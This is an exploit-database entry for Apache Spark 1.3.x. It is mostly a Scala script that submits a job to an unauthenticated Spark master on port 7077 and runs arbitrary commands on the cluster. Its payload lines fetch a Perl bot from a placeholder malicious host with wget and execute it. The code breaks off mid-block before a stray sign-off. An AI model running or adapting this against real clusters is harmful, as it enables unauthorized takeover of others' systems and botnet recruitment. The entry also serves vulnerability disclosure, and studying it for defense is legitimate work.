Apache Spark Cluster 1.3.x Arbitrary Code Execution

Type packetstorm
Reporter Akhil Das
Modified 2015-04-16T00:00:00


                                            `# Exploit Title: Arbitary Code Execution in Apache Spark Cluster  
# Date: 23/03/2015  
# Exploit Author: AkhlD (AkhilDas) <akhld@live.com> CodeBreach.in  
# Vendor Homepage: https://spark.apache.org/  
# Software Link: https://spark.apache.org/downloads.html  
# Version: All (0.0.x, 1.1.x, 1.2.x, 1.3.x)  
# Tested on: 1.2.1  
# Credits: Mayur Rustagi (@mayur_rustagi), Patrick Wendel (@pwendell) for  
# Reference(s) :  
# Exploit URL : https://github.com/akhld/spark-exploit/  
# Spark clusters which are not secured with proper firewall can be taken  
over easily (Since it does not have  
# any authentication mechanism), this exploit simply runs arbitarty codes  
over the cluster.  
# All you have to do is, find a vulnerable Spark cluster (usually runs on  
port 7077) add that host to your  
# hosts list so that your system will recognize it (here its  
spark-b-akhil-master pointing  
# to in my /etc/hosts) and submit your Spark Job with arbitary  
codes that you want to execute.  
# Language: Scala  
import org.apache.spark.{SparkContext, SparkConf}  
* Created by akhld on 23/3/15.  
object Exploit {  
def main(arg: Array[String]) {  
val sconf = new SparkConf()  
.setMaster("spark://spark-b-akhil-master:7077") // Set this to the  
vulnerable host URI  
.set("spark.cores.max", "2")  
.set("spark.executor.memory", "2g")  
.set("spark.driver.host","hacked.work") // Set this to your host from  
where you launch the attack  
val sc = new SparkContext(sconf)  
val exploit = sc.parallelize(1 to 1).map(x=>{  
//Replace these with whatever you want to get executed  
val x = "wget https://mallicioushost/mal.pl -O bot.pl".!  
val y = "perl bot.pl".!  
Best Regards